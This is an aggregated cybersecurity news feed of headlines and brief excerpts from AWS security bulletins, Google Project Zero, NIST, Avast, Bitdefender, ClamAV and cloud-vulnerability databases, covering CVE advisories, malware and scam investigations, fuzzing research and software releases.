AWS is aware of CVE-2022-1471 in SnakeYaml software, included in DynamoDB local jar and Docker distributions from version 1.21 and version 2.0. If leveraged, this issue could allow an actor to perform remote code execution using the SnakeYaml's Constructor(), as the software does not restrict the types that can be instantiated during deserialization. AWS has found no evidence that this issue has been leveraged, however, customers should still take action. On November 6, 2024, we released a fix for this issue. Customers should upgrade DynamoDB local to the latest version: v1.25.1 and above, or 2.5.3 and above.
Please email aws-security@amazon.com with any security questions or concerns.
https://aws.amazon.com/security/security-bulletins/AWS-2024-014/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scanning For Credentials, and BotPoke Changes IPs Again
Nearly 50% of observed traffic is looking for accidentally exposed data.
https://www.f5.com/labs/articles/threat-intelligence/scanning-for-credentials-and-botpoke-changes-ips-again
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Data Pipeline Challenges of Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Introduction In this post, we talk with Dr. Xiaowei Huang and Dr. Yi Dong (University of Liverpool) and Sikha Pentyala (University of Washington Tacoma), who were winners in the UK-US PETs Prize Challenges . We discuss real-world data
https://www.nist.gov/blogs/cybersecurity-insights/data-pipeline-challenges-privacy-preserving-federated-learning
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Predictions 2025: The Future of Cybersecurity Unveiled
The digital world is evolving at breakneck speed. In 2025, we're set to witness transformative changes in cybersecurity that will redefine trust, security, and how we navigate our digital lives. Here's what we see coming: Read the full blog to explore the trends in depth. The future of cybersecurity will demand both solutions and vigilance. […]
The post Predictions 2025: The Future of Cybersecurity Unveiled appeared first on Avast Threat Labs.
https://decoded.avast.io/threatintel/predictions-2025-the-future-of-cybersecurity-unveiled/?utm_source=rss&utm_medium=rss&utm_campaign=predictions-2025-the-future-of-cybersecurity-unveiled
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Zero Trust Architecture
Zero trust security takes an “never trust, always verify” approach to access control. Access is only granted once an individual’s identity and context have been confirmed through multifactor authentication and...
The post Zero Trust Architecture appeared first on Hacker Combat.
https://www.hackercombat.com/zero-trust-architecture/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What Is a Security Operations Center (SOC)?
A Security Operations Center (SOC) specializes in monitoring and analyzing data to detect cyber threats and prevent attacks from them. They work to sort actual threats from false positives before...
The post What Is a Security Operations Center (SOC)? appeared first on Hacker Combat.
https://www.hackercombat.com/soc/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
XDR vs SIEM Security Information and Event Management
The Extended Detection and Response Platform (XDR) ingestion and correlation technology captures and correlates high-fidelity data across your security layers, such as endpoint, network, logs, cloud services and identities to...
The post XDR vs SIEM Security Information and Event Management appeared first on Hacker Combat.
https://www.hackercombat.com/xdr-vs-siem/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Best Free EDR for Windows PC
Endpoint detection and response (EDR) tools offer businesses that employ hybrid work models or remote employees an extra layer of cybersecurity protection. Utilizing artificial intelligence (AI) and machine learning (ML),...
The post Best Free EDR for Windows PC appeared first on Hacker Combat.
https://www.hackercombat.com/best-free-edr-tools-for-windows-pc/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Free EDR Solutions for Home Users in 2025
EDR can detect and respond to emerging and advanced cyber threats quickly and efficiently, making it an essential component of modern business ecosystems. Beyond signature-based detection capabilities, its features go...
The post Free EDR Solutions for Home Users in 2025 appeared first on Hacker Combat.
https://www.hackercombat.com/free-edr-solutions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Simple macOS kernel extension fuzzing in userspace with IDA and TinyInst
Posted by Ivan Fratric, Google Project Zero
Recently, one of the projects I was involved in had to do with video decoding on Apple platforms, specifically AV1 decoding. On Apple devices that support AV1 video format (starting from Apple A17 iOS / M3 macOS), decoding is done in hardware. However, despite this, during decoding, a large part of the AV1 format parsing happens in software, inside the kernel, more specifically inside the AppleAVD kernel extension (or at least, that used to be the case in macOS 14/ iOS 17). As fuzzing is one of the techniques we employ regularly, the question of how to effectively fuzz this code inevitably came up.
It should be noted that I wasn’t the first person to look into the problem of Apple kernel extension fuzzing, so before going...
https://googleprojectzero.blogspot.com/2024/11/simple-macos-kernel-extension-fuzzing.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Kicking-Off with a December 4th Workshop, NIST is Revisiting and Revising Foundational Cybersecurity Activities for IoT Device Manufacturers, NIST IR 8259!
In May 2020, NIST published Foundational Cybersecurity Activities for IoT Device Manufacturers (NIST IR 8259), which describes recommended cybersecurity activities that manufacturers should consider performing before their IoT devices are sold to customers. These foundational cybersecurity activities can help manufacturers lessen the cybersecurity-related efforts needed by customers, which in turn can reduce the prevalence and severity of IoT device compromises and the attacks performed using compromised devices. In the nearly five years since this document was released, it has been published
https://www.nist.gov/blogs/cybersecurity-insights/kicking-december-4th-workshop-nist-revisiting-and-revising-foundational
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Gen Q3/2024 Threat Report
The third quarter threat report is here—and it's packed with answers. Our Threat Labs team had uncovered some heavy stories behind the stats, exposing the relentless tactics shaping today's threat landscape. Here's what you need to know: This is just the surface. Read the full report and see how our Threat Labs team is relentlessly […]
The post Gen Q3/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/gen-q3-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=gen-q3-2024-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Inside Bitdefender Labs' Investigation of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates.
One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta's social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unlocking Cybersecurity Talent: The Power of Apprenticeships
Cybersecurity is a fast-growing field, with a constant need for skilled professionals. But unlike other professions — like medicine or aviation — there's no clear-cut pathway to qualifying for cybersecurity positions. For employers and job seekers alike, this can make the journey to building a team (or entering a successful cybersecurity career) feel uncertain. Enter the registered apprenticeship program — a proven method for developing skilled talent in cybersecurity that benefits both the employer and the new professional. Let's commit to supporting this important talent development approach
https://www.nist.gov/blogs/cybersecurity-insights/unlocking-cybersecurity-talent-power-apprenticeships
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver's license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver's license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-ecosystem
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ModeLeak: LLM Model Exfiltration Vulnerability in Vertex AI
A vulnerability in GCP's Vertex AI service allows privilege escalation and unauthorized access to sensitive LLM models. Attackers can exfiltrate these models by exploiting misconfigurations in access controls and service bindings.
By exploiting custom job permissions, researchers were able to escalate their privileges and gain unauthorized access to all data services in the project.
In addition, deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a proprietary and sensitive data exfiltration attack risk.
https://www.cloudvulndb.org/gcp-vertexai-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with data.all (Multiple CVEs)
Publication Date: 2024/11/8 4:00 PM PDT
Data.all is an open source development framework to help customers build a data marketplace on AWS.
We have identified the following issues within data.all version 1.0.0 through 2.6.0. On November 8, 2024, we released a fix and recommend customers upgrade to version 2.6.1 or later and ensure any forked or derivative code are patched to incorporate the new fixes.
CVE-2024-52311 relates to an issue where data.all does not invalidate authentication token upon user logout.
CVE-2024-52312 relates to an issue where data.all authenticated users can perform restricted operations against DataSets and Environments.
CVE-2024-52313 relates to an issue where data.all authenticated users can obtain incorrect object level authorizations.
CVE-2024-52314...
https://aws.amazon.com/security/security-bulletins/AWS-2024-013/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code
Posted by the Big Sleep team
Introduction
In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind.
Today, we're excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found...
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Repo swatting attack deletes/blocks GitHub and GitLab accounts
A technique called "repo swatting" allows attackers to delete GitHub and block GitLab accounts by exploiting file upload features and abuse reporting mechanisms. Attackers upload malicious files to a target's repository, then report the account for hosting malicious content, potentially resulting in account deletion. The vulnerability was partially mitigated by October 2024 via changes in upload URL paths and requirement for each uploader to be authenticated (in GitHub).
https://www.cloudvulndb.org/repo-swatting-attack-deletes-github-gitlab-accounts
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Karma connection in Chrome Web Store
Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users' every move to some Amazon cloud server. But that wasn't all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don't appear to be malicious yet.
While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than...
https://palant.info/2024/10/30/the-karma-connection-in-chrome-web-store/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unmasking the SYS01 Infostealer Threat: Bitdefender Labs Tracks Global Malvertising Campaign Targeting Meta Business Pages
In a world ran by advertising, businesses and organizations are not the only ones using this powerful tool. Cybercriminals have a knack for exploiting the engine that powers online platforms by corrupting the vast reach of advertising to distribute malware en masse.
While legitimate businesses rely on ads to reach new audiences, hackers exploit these platforms to trick users into downloading harmful software. Malicious ads often seem to promote legitimate software, streaming services, or produc
https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Staff Stories Spotlight Series: Cybersecurity Awareness Month 2024
This blog is part of a larger NIST series during the month of October for Cybersecurity Awareness Month , called 'Staff Stories Spotlight.' Throughout the month of October this year, Q&A style blogs will be published featuring some of our unique staff members who have interesting backgrounds, stories to tell, and projects in the world of cybersecurity. This year's Cybersecurity Awareness Month theme is ‘Secure our World.' How does this theme resonate with you, as someone working in cybersecurity? Now more than ever, the use of technology is central to our lives. It is the means by which we are
https://www.nist.gov/blogs/cybersecurity-insights/staff-stories-spotlight-series-cybersecurity-awareness-month-2024-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloud Security Essentials
Cloud security involves employing perimeter defenses like firewalls, IDPSs and VPNs as well as guaranteeing isolation through network segmentation and virtual LANs while monitoring traffic for anomalies and threats –...
The post Cloud Security Essentials appeared first on Hacker Combat.
https://www.hackercombat.com/cloud-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Antivirus Software
Antivirus software protects devices against viruses, malware, and other cyberthreats by detecting, quarantining, and deleting malicious code. Modern antivirus products also offer additional security features such as password protection, identity...
The post Antivirus Software appeared first on Hacker Combat.
https://www.hackercombat.com/antivirus-software/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Windows Registry Adventure #4: Hives and the registry layout
Posted by Mateusz Jurczyk, Google Project Zero
To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry really works internally, things may get confusing really fast. What are hives? How do they map or relate to the top-level keys? Why are some HKEY root keys pointing inside of other root keys (e.g. HKCU being located under HKU)? These are all valid questions, but they are difficult to answer without fully understanding the interactions between the user-mode Registry API and the kernel-mode registry...
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to Protect Against Ransomware Attacks?
Criminal hackers employ ransomware attacks against their targets by encrypting their data and demanding that a ransom be paid within an allotted timeframe or risk losing it forever. When an...
The post How to Protect Against Ransomware Attacks? appeared first on Hacker Combat.
https://www.hackercombat.com/protect-against-ransomware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS CDK Bucket Squatting Risk
The AWS Cloud Development Kit (CDK) is a way of deploying infrastructure-as-code. The vulnerability involves AWS CDK's use of a predictable S3 bucket name format
(cdk-{Qualifier}-assets-{Account-ID}-{Region}), where the default “random” qualifier (hnb659fds) is common and easily guessed. If an AWS customer deletes this bucket and reuses CDK,
an attacker who claims the bucket can inject malicious CloudFormation templates, potentially gaining admin access. Attackers supposedly only need the AWS account ID to prepare the bucket
in various regions, exploiting the default naming convention. However, it is important to note that the additional conditions greatly lower the likelihood of exploitation.
The victim must use the CDK, having deleted the bucket, and then subsequently attempt to...
https://www.cloudvulndb.org/aws-cdk-squatting
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
IoT Assignment Completed! Report on Barriers to U.S. IoT Adoption
The 16 members of the NIST-managed Internet of Things (IoT) Advisory Board have completed their report on barriers to the U.S. receiving the benefits of IoT adoption, along with their recommendations for overcoming those barriers. As Benson Chan (Chair) and Dan Caprio (Vice Chair) of the IoT Advisory Board state in the report: “The United States is in the early stages of a profound transformation, one that is driven by economic, societal, and cultural innovations brought about by the IoT. These innovations intertwine connectivity and digital innovation with the opportunity to drive a
https://www.nist.gov/blogs/cybersecurity-insights/iot-assignment-completed-report-barriers-us-iot-adoption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Missing JWT issuer and signer validation in ALB middleware
https://www.cloudvulndb.org/missing-jwt-issuer
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Data exfil via VPC endpoint denials in CloudTrail
CloudTrail delivered events to the resource owner and API caller even when the API action was denied by the VPC endpoint policy.
This could have enabled a stealthy data exfiltration method in cases where an attacker had previously compromised a VPC, by smuggling data through the user agent field in denied requests.
https://www.cloudvulndb.org/vpc-endpoint-log-data-exfil
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Protecting Your Website From DDoS Attack
Distributed denial-of-service attacks pose an increasing threat to organizations, with even some of the largest firms suffering significant disruptions from such attacks. Attackers use botnets of compromised IoT devices to...
The post Protecting Your Website From DDoS Attack appeared first on Hacker Combat.
https://www.hackercombat.com/ddos-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Subdomain Takeover Vulnerability in GitLab Pages
A vulnerability in GitLab Pages allowed attackers to take over dangling custom domains pointing to 'instanceX.gitlab.io'. The issue occured when adding an unverified custom domain to GitLab Pages, which serves content for 7 days before disabling. This could lead to cookie stealing, phishing campaigns, and bypassing of Content-Security Policies and CORS.
https://www.cloudvulndb.org/subdomain-takeover-vulnerability-gitlab-pages
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Effective Fuzzing: A Dav1d Case Study
Guest post by Nick Galloway, Senior Security Engineer, 20% time on Project Zero
Late in 2023, while working on a 20% project with Project Zero, I found an integer overflow in the dav1d AV1 video decoder. That integer overflow leads to an out-of-bounds write to memory. Dav1d 1.4.0 patched this, and it was assigned CVE-2024-1580. After the disclosure, I received some questions about how this issue was discovered, since dav1d is already being fuzzed by at least oss-fuzz. This blog post explains what happened. It’s a useful case study in how to construct fuzzers to exercise as much code as possible. But first, some background...BackgroundDav1d
Dav1d is a highly-optimized AV1 decoder. AV1 is a royalty-free video coding format developed by the Alliance...
https://googleprojectzero.blogspot.com/2024/10/effective-fuzzing-dav1d-case-study.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with NVIDIA Container Toolkit (CVE-2024-0132, CVE-2024-0133)
Publication Date: 2024/10/01 6:35 PM PDT
AWS is aware of CVE-2024-0132 and CVE-2024-0133, issues affecting the NVIDIA container toolkit 1.16. At this time, the following services require customer action. If we become aware of additional impact, we will update this bulletin.
Amazon Elastic Container Service (Amazon ECS)
Amazon ECS has released updated ECS GPU-optimized Amazon Machine Images (AMIs) with the patched NVIDIA container toolkit v1.16.2. We recommend that ECS customers update to these AMIs (or the latest available). Additional information on the ECS-optimized AMI is available at in our "Amazon ECS-optimized Linux AMIs" developer guide.
Amazon Elastic Kubernetes Service (Amazon EKS)
Amazon EKS has released updated EKS GPU-optimized Amazon Machine Images...
https://aws.amazon.com/security/security-bulletins/AWS-2024-010/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lies, damned lies, and Impact Hero (refoorest, allcolibri)
Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven't been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment.
Colibri Hero (also known as allcolibri) is a company with a noble mission:
We want to create a world where organizations can make a positive impact on people and communities.
One of the company's products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website:
Plantation financed by our partners
So the users merely need to have the...
https://palant.info/2024/10/01/lies-damned-lies-and-impact-hero-refoorest-allcolibri/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CloudImposer
Google Cloud Composer is a managed service for Apache Airflow. Tenable discovered that the Cloud Composer package was vulnerable to dependency confusion, which could have allowed attackers to
inject malicious code when the package was compiled from source. This could have led to remote code execution on machines running Cloud Composer, which include various other GCP services as
well as internal servers at Google. The dependency confusion stemmed from Google's risky recommendation in their documentation to use the --extra-index-url argument when installing private
Python packages. Following disclosure, Google fixed the dependency confusion vulnerability and also updated their documentation.
https://www.cloudvulndb.org/cloudimposer-gcp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with exception to 0.103.12) through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.4.1ClamAV 1.4.1 is a critical patch release with the following fixes:CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files.This issue affects all currently supported versions. It will be fixed in:1.4.11.3.21.0.70.103.12Thank...
http://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis & building proof-of-concept for CVE-2024-38063, a CVSS 9.8 Vulnerability In the Windows Kernel IPv6 Parser
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.0 feature release and ClamAV bytecode compiler 1.4.0 release
The ClamAV 1.4.0 feature release is now stable. We encourage everyone to download the latest version now from the ClamAV downloads page, on the GitHub Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and will be made available when they are ready.We are also publishing ClamAV bytecode compiler version 1.4.0.The ClamAV bytecode compiler release files are available for download on the GitHub Release page and through Docker Hub.ClamAV platform support changesWe will no longer provide Linux 32-bit packages. With RHEL 7 reaching end-of-life, we had to upgrade our build hosts and selected Alma Linux 8. Alma Linux does not provide 32-bit images. ClamAV users on 32-bit platforms can still build from source.We now provide...
http://blog.clamav.net/2024/08/clamav-140-feature-release-and-clamav.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant user risks. The rise of AI and deepfake technology has intensified scams exploiting famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and profit millions of dollars.
The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations/?utm_source=rss&utm_medium=rss&utm_campaign=cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
RADIUS Protocol CVE-2024-3596
A fundamental design flaw within the RADIUS protocol has been proven to be exploitable, compromising the integrity in the RADIUS Access-Request process. The attack allows a malicious user to modify packets in a way that would be indistinguishable to a RADIUS client or server. To be successful, the attacker must have the ability to inject themselves between the client and server. Revised on 2025-04-23 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-255
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 0.103 LTS End of Life Announcement
The
ClamAV 0.103 LTS release is nearing end-of-life (EOL) with regards to security
vulnerability fix support from our team. This end of life date will be
Sept. 14, 2024.
ClamAV 0.103 users will be able to update signatures from the official database
mirror for an additional one year after the EOL date.
After Sept. 14, 2025, we may block ClamAV 0.103 from downloading signature
updates.
We recommend that users update to the newest LTS release, ClamAV 1.0.6.
For users that want to upgrade to the newest non-LTS release, use ClamAV 1.3.1.
The most recent version of ClamAV can be found here: https://www.clamav.net/downloads
The following is a list of major changes available to users in the newest
versions of ClamAV.
Since ClamAV 0.103, ClamAV 1.0 LTS adds:
·
A...
http://blog.clamav.net/2024/08/clamav-0103-lts-end-of-life-announcement.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
60 Hurts per Second – How We Got Access to Enough Solar Power to Run the United States
The electricity grid – the buzzing, crackling marvel that supplies the lifeblood of modernity - is by far the largest structure humanity ever built. It's so big, in fact, that few people even notice it, like a fish can't see the ocean.
Until the grid goes down, that is. Then, like the fish dangling from the angler's hook, we see our vulnerability. Modernity dissolves into a sudden silence, followed by the repeated flick of a light switch, and a howl of panic at the prospect of missed appointmen
https://www.bitdefender.com/en-us/blog/labs/60-hurts-per-second-how-we-got-access-to-enough-solar-power-to-run-the-united-states
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary.
But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds. Sponsored ads can often be beneficial as they are customized to suit online personas, offering relevant content tailored specifically for you. While personalized ads can help enhance your online experience, not all are legitimate. In fact, scams originating from phony ads on social media have increased dramatically, with potentially severe consequences for consumers.
Sponsored supplement scams on social media platforms
https://www.bitdefender.com/en-us/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […]
The post Decrypted: DoNex Ransomware and its Predecessors appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Windows Registry Adventure #3: Learning resources
Posted by Mateusz Jurczyk, Google Project
Zero
When tackling a new vulnerability research target, especially a closed-source one, I
prioritize gathering as much information about it as possible. This gets especially interesting when
it's a subsystem as old and fundamental as the Windows registry. In that case, tidbits of valuable data
can lurk in forgotten documentation, out-of-print books, and dusty open-source code – each potentially
offering a critical piece of the puzzle. Uncovering them takes some effort, but the payoff is often immense.
Scraps of information can contain hints as to how certain parts of the software are implemented, as well as
why – what were
...
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Diamorphine rootkit variant seen undetected in the wild
Introduction Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild. Diamorphine is a well-known […]
The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level organizations in countries of the South China Sea region, all performed by the same threat actor we track as Unfading Sea Haze. Based on the victimology and the cyber-attack's aim, we believe the threat actor is aligned with China's interests.
As tensions in the region rise, they are reflected in the intensification of activity on behalf of the Unfading Sea Haze actor, which uses new and improved tools and TTPs.
We notice
https://www.bitdefender.com/en-us/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues. This report documents four vulnerabilities affecting devices powered by the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT integrations, these flaws have a significant downstream impact on several vendors.
In the interconnected landscape of the Internet of Things (IoT), the reliability and security of devices,
https://www.bitdefender.com/en-us/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign
The post Avast Q1/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers.
The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […]
The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
